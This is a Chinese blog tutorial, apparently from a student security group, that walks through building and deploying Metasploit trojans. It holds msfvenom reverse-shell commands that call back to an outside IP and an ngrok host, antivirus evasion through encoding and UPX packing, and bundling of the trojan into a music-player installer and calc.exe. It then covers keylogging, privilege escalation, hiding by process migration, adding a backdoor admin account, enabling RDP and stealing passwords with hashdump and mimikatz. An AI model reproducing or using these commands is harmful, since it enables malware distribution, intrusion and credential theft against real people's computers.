我惊了!!!木马居然也能这么easy???


原标题为:msf攻击与提权

温馨提示:此文有真意,适合反复研读,

常言道:“巧妇难为无米之炊。”各位巧妇看官,此篇文章中需要用到的工具有:

1.centos linux系统一个。可以通过VMware安装一台虚拟机来实现;
2.metasploit工具一个。本文将会手把手教你安装;
3.目标机一台;
4.calc2.exe(windows系统自带的计算器)、网易云音乐的安装包(性感小编,在线打广告)、任意图片一张(噫?我怎么变黄了?>)等。

话不多说,开始整活~

[

来嗷,先整他一手安装工具
metasploit CentOS Linux release 7.6.1810部署安装

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

直接全复制上然后右键(别ctrl+v,莫得用)粘贴进centos里回车就行。安装时,有y就输入y再扣回车。

安装完成
好了,就决定是你了,去吧,皮卡丘 metasploit
启动

msfconsole


·生成木马

三种木马生成方式

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=120.55.163.166 lport=5555 -f exe > **/fxxk.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b'0x00'LHOST=192.168.1.108 LPORT=5555 -f exe > fxxk.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=120.55.163.166 5555 -f exe -o fxxk.exe

注:
shikata_ga_nai一种编码器
-i 后面的5是指编码次数,让木马更难被杀死

说明:
第一条命令的“**”指的是(生成的地址)
“exe >”后面加生成的地址
“-p” 指定一个payload(攻击载荷)
“x64” windows64位的,如果要32位的话x86即可
“reverse_tcp” 建立了一个tcp的反弹木马
“lhost=” 后面加数据返回的主机IP地址(就是攻击机的主机地址)
“lport=” 后加端口(可以在端口范围内随意设置)1-65535
“-f” 后指定生成的文件类型,这里是exe类型,还可以php什么的
“fxxk.exe” 名字随意起,什么吸引眼球的名字都可
注:linux系统查看文件路径的方法查看笔记《linux指令学习》
.exe文件发不过去的话,把他变成压缩包形式再发

杨学长推荐的生成指令
搞出来的. c文件用vc++6.0编译出来
实测免杀效果很好
可以过微软自带杀软和360,火绒不过腾讯管家会报毒
再加个内网穿透你就可以为所欲为了

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=ip lport=端口 -f c

制作免杀木马后门
首先,在kali中用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c

上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。
我这里选择生成基于C语言的数组,当然你也可以用以下命令直接得到exe木马,但这样免杀效果会打折扣,经笔者测试多次,重复编码12次后免杀效果非常强大!


·伪装木马

图片&木马压缩伪装
选定好木马和图片

点击添加到压缩文件

木马绑定软件实现隐藏
以网易云音乐为例
先将win10的安装包拖入kali机器

用ls指令查看安装包位置
复制去木马创建的指令中

msfvenom -p windows/meterpreter/reverse_tcp lhost=120.55.163.166 lport=5555 -x 网易云音乐exe -k -f exe -o 网易云音乐exe

注:-x 后面接要绑定木马的安装包


·实现免杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=4444 -f exe -o calc2.exe

注:-x 后面接要绑定木马的软件

绑定去一个计算机上
现在还不能免杀
所以我们要进行加壳操作

upx -5 calc2.exe

calc2.exe带木马要加壳的软件
查看是否能加壳成功骗过杀软:
www.virscan.org
(就是说,做好的软件先放在这个网站扫一下,来确定是否实现免杀)cs 免杀 payload 绕过 360 全家桶
https://mp.weixin.qq.com/s?__biz=MzU2NzkxMDUyNg==&mid=2247485159&idx=1&sn=be711036833ef568d8fccee4d9c06c17&chksm=fc974ff6cbe0c6e02de558314562bcbf3f7c57e8c36c3c27a78bfa096b8625b246acd1e115c2&mpshare=1&scene=23&srcid=&sharer_sharetime=1574059324302&sharer_shareid=1794e0ea39d9cb7c4b139b2758115219#rd‘




·使用handler模块(设置监听)

use exploit/multi/handler

·设置PAYLOAD(设置监听)

set payload windows/meterpreter/reverse_tcp

·查看设置

show options

·设置

set lhost 0.0.0.0
set lport 2224

说明:set lport后面的端口要和生成木马的时候一样的

·攻击

exploit

或者

run

成功标志

sysinfo

查看桌面文件

ls

显示正在那个目录下

pwd

进入桌面路径

注意:linux和windows的目录分割符号是相反的

显示目标系统上的进程

ps

查看键盘记录

keyscan_start

再输入

keyscan_dump





提权,使得我们可以完全掌控对方电脑

用户的服务器运行(查看正在运行的用户)

getuid

利用已知漏洞,自动提权为SYSTEM

getsystem

注:SYSTEM一般是最高用户

隐藏我们的木马,
使他在任务管理器上看不见了,
这样被攻击方就关不掉我们的木马了
方法:转移进程

migrate *****

说明:*是进程编号
因为我们现在是在SYSTEM用户上
我们要找一个SYSTEM进程上去
我们要转移到对方一直开启的进程上去
相关文章:
https://www.cnblogs.com/hkleak/p/5770300.html
(但实际上手动选择迁移是不很难成功的)
所以我们要用到自动迁移

run post/windows/manage/migrate


隐藏成功

有了SYSTEM权限后,我们就可以增加用户了
查询windows系统上存在的用户账号

net user


进入对方电脑的cmd

shell

退出对方电脑cmd

exit

这样我们就可以输入windows上面的指令了

添加账号

net user hack 123 /add

说明:
hack是账号
123账号密码

添加完成
把hack账号添加到管理员组(即帮创建的账号提权)

net localgroup adminstrators hack /add

查看是否提权成功

net user hack

成功标志

打开远程连接端口(直接用mstsc连接他)

run post/windows/manage/enable_rdp

一步完成 添加远程桌面的用户(同时也会将该用户添加到管理员组)

run post/windows/manage/enable_rdp username=test password=test



查出他电脑上其他用户的用户密码

run hashdump

成功查询到哈希加密过的用户密码
要想直接跑出明文密码
使用猕猴桃命令或者在他电脑上装猕猴桃软件直接跑
猕猴桃指令版
打开工具

load mimikatz

接着抓取密码
哈希值版

msv

明文版(一般会失败,不推荐)

ssp
wdigest
kerberos

软件版

把对应的版本复制去对方的远程桌面上去就有了
受害机的情况:

查看版本号

version

抓取密码

privilege::debug 
sekurlsa::logonpasswords

内网渗透中mimikatz的使用(主要):https://blog.csdn.net/pyphrb/article/details/52051321?locationNum=11&fps=1绕过杀软执行mimikatz:https://www.freebuf.com/articles/web/176796.htmlD:\Desktop\CTF\msf

停止msf(结束罪恶的一身

exit

文案:梁文豪
排版、编辑:黄翰炜

相关推荐

发表评论

路人甲

网友评论(0)